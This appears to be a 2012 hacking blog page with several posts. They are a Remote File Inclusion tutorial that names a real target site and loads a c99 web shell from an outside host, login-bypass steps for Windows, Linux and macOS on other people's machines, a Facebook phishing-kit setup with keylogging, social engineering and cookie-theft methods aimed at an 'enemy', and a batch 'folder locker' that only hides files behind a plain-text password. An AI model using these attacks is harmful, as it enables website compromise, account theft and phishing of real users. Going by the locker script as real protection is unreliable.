Ethical hacking ebooks| tips and tricks| windows tricks| software| mobile| infotechno| free download with full version| games| ipad and; iphone|Android| google | java | c language | mobile | facebook | whatsapp | Earn money


Hack a website by Remote File Inclusion

6/22/2012




Another website attack named Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it. Searching the Vulnerability Remote File inclusion vulnerability is usually occurred in those sites which have a navigation similar to the below one www.Targetsite.com/index.php?page=Anything

To find the vulnerability the hacker will most commonly use the following Google Dork
"inurl:index.php?page=”

This will show all the pages which has "index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

www.targetsite.com/index.php?page=www.google.com

Let’s say that the target website is http://www.cbspk.com So the hacker URL will become

http://www.cbspk.com/v2/index.php?page=http://www.google.com

If after executing the command the homepage of the google shows up then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack. Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. The hacker would first upload the shells to a web hosting site such as ripway.com, 110mb.com etc. Now here is how a hacker would execute the shells to gain access. Let’s say that the URL of the shell is

http://h1.ripway.com/yourdomain/c99.txt

Now here is how a hacker would execute the following command to gain access
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/yourdomain/c99.txt?

Remember to add "?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it

Hack Password of any Operating System

6/22/2012

Today we will learn how to hack and gain the access of a PCs operating system as one thing any hacker should know is how to hack into login account of any operating system. Major Operating Systems that are used these days are Windows, Linux and Mac. So today I will show you how to hack into these Operating Systems. Are you curious how easy it is for
someone to gain access to your computer? If so, read on to see the technique one might use to figure out your computer password.






So let’s start with the common OS

Windows -

Windows being very popular has a lot of programs available which can be used to hack the login password. One of the most successful programs is Ophcrack, and it is free. Ophcrack is based on Slack ware, and uses rainbow tables to solve passwords up to 14 characters in length. The time required to solve a password? Generally 10 seconds. The expertise needed? None.
 

Simply download the Ophcrack ISO and burn it to a CD (or load it onto a USB drive via UNetbootin). Insert the CD into a machine you would like to gain access to, then press and hold the power button until the computer shuts down. Turn the computer back on and enter BIOS at startup. Change the boot sequence to CD before HDD, then save and exit. The computer will restart and Ophcrack will be loaded. Sit back and watch as it does all the work for your. Write down the password it gives you, remove the disc, restart the computer, and log in as if it were you own machine.
 

You can download OphCrack from the following link:

 http://ophcrack.sourceforge.net

Linux -

Linux is an operating system which is quickly gaining popularity in mainstream, but not so common that you’re likely to come across it. Though Mac and Linux are both based on UNIX, it is easier to change the password in Linux than it is OS X.

To change the password, turn on the computer and press the ESC key when GRUB appears. Scroll down and highlight  ‘Recovery Mode’ and press the ‘B’ key; this will cause you to enter ‘Single User Mode’.
You’re now at the prompt, and logged in as ‘root’ by default. Type ‘passwd’ and then choose a new password. This will change the root password to whatever you enter. If you’re interested in only gaining access to a single account on the system, however, then type ‘passwd username’ replacing ‘username’ with the login name for the account you would like to alter the password for. 

Mac -

Finally we take on Mac’s OS X which as we said earlier is based on UNIX and is difficult to change password compared to Linux but nothing is impossible to be hacked. The easiest method would be to use Ophcrack on this also as it works with Mac and Linux in addition to Windows.However, there are other methods that can be used, as demonstrated below. If the Mac runs OS X 10.4, then you only need the installation CD. Insert it into the computer, reboot. When it starts up,

select UTILITIES > RESET PASSWORD. Choose a new password and then use that to log in.
If the Mac runs OS X 10.5, restart the computer and press COMMAND + S. When at the prompt, type:

fsck -fy
mount -uw /
launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist
dscl . -passwd /Users/UserName newpassword


That’s it. Now that the password is reset, you can login.

Make a Private Folder with Your Password without Software

6/22/2012

Step 1:- Open the Notepad.exe
Step 2:- Copy the following code into the notepad.


Quote: cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDENTER PASSWORD TO OPEN
:CONFIRM
echo -----------------------------------------------------------
echo ================== Www.infototechno.blogspot.com ==================
echo -----------------------------------------------------------
echo Are you sure you want to lock the folder(Y/N)
echo Press (Y) for Yes and Press (N) for No.
echo -----------------------------------------------------------
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo -----------------------------------------------------------
echo ================== Www.infototechno.blogspot.com ==================
echo -----------------------------------------------------------
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== YOUR PASSWORD goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDENTER PASSWORD TO OPEN
md Private
echo Private created successfully
goto End
:End


Step 3:- Now change the password in the if NOT %pass%==YOUR PASSWORD goto FAIL line replace text of Your Password with your password for the folder lock.

Step 4:- Now save this file as locker.bat and you are done.

Step 5:- Now Open the Locker.bat file and enter your password to open a private folder of yours.

Step 6:- Now copy paste the files which you want to hide and make it secure in the private folder.

Step 7:- Now again open the Locker.bat file and press 'Y' to lock the private folder with your password.

Step 8:- Now to again open the secured files open the locker.bat file Enter your password and your files are there for you.

4 Ways To Hack Facebook Account

6/18/2012

Today, I am going to tut u about faceb0ok account hacking. Here I will tut u about 5 advance method with the help of which you can hack ur enemy's facebook password.

I will cover 4 methods over here:

1. Facebook Phishing
2. Keylogging
3. Social engineering
4. Primary email address hack
5.   Cookie Stealing

you may also read this :-

Hack A Facebook Account With ARP Poisoning

How to Hack Facebook Status by SMS Spoofing

Facebook phishing:



I have taken this method first because i think this is the most popular method/way of hacking facebook. I studied various facebook surveys taken on web about hacking facebook. The results of these surveys show "Phishing" as the most used method to hack facebook and to note…"Phishing is favorite method of facebook hackers". So, friends.. beware of facebook Phishing. Facebook staff is working hard to avoid these Facebook phishers. Phishing not only allows you to hack Facebook but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose. 

what is phishing?

Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. However phishing requires specialized knowledge and high level skills to implement. So I recommend the use of Phishing to hack facebook account since it is the easiest one.

Phishing Procedure
:

First of all download
Facebook fake login page

1.
once you have downloded facebook fake login page now extract contents in a folder

2.
Now open pass.php and find (CTRL+F) 'http://infototechno.blogspot.com' then change it to your to is the 'http://www.google.com.bg'

Note:
'http://www.google.com' is the redirection url,When victim will enter his/her email and password he will redirected to'http://www.google.com.bg' instead of "http://infototechno.blogspot.in"

Now Save it .


3
.Now open facebook fake page in a wordpad

4.
Now in the fake page press Ctrl+F and search for the term "action=" now change its value to pass.php i.e. action=pass.php



5. Create an id in www.110mb.com,www.ripway.com or t35.com.

Note:
Lots of people have complaint that they get banned from 110mb.com.ripway.com and t35.com so as an alternative you can use ooowebhost.

6.
Then upload all the files Facebook.htm,Pass.php in 110mb directory or an other and just test it by going to http://yoursite.110mb.com/Facebook.htm for the fake login page.Just type some info into the text box and then you will see in your file manager that a file called "Facebook.txt" is created, In which the password is stored

7.
Go to http://yoursite.110mb.com/Facebookpassword.htm for the stored passwords !

and see you got the password

 Keylogging:


This is my second favorite, as only thing you have to do is remotely install a keylogger application (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack facebook password.

Best KeyloggersWinspy Keylogger, SniperSpy

3. Social engineering:

This sounds to be pretty not working at beginning. Even I was neglecting this way. But, once, I thought of using it against my friend on Facebook and i got his Facebook password very easily by this method. I think many of you might be knowing how what this social engineering, For newbies, social engineering is method of retrieving password or answer of security question simply be quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.


4.Primary email address hack

So far, i found these Facebook hacking methods as best and working ways to hack facebook account passwords. I never encourage hacking Facebook or any email account,,I just wanna make you aware about Facebook dangers online. I will appreciate your effort if you mention any other Facebook hacking method. 

5. Facebook Cookie Stealing 

I am updating this post with a new method which is being used to hack facebook accounts, which I think is very effective, Facebook cookie stealing is becoming popular day by day.The cookie which facebook uses to authenticate it's users is called "Datr", If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account

Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;

CEH Official Certified Ethical Hacker Review Guide

6/18/2012

The EC-Council's Certified Ethical Hacker has emerged as one of today's most sought-after certifications. This is the only official review guide to the test, covering all CEH exam objectives, from ethics and testing to securing wired and wireless networks. Written by bestselling certification author Todd Lammle, this concise, focused guide is ideal for people who have taken CEH classes and need a last-minute review. The CD-ROM features two bonus exams, 150 flashcard questions, a searchable glossary of key terms, and hacking tools used in the EC-Council's CEH training.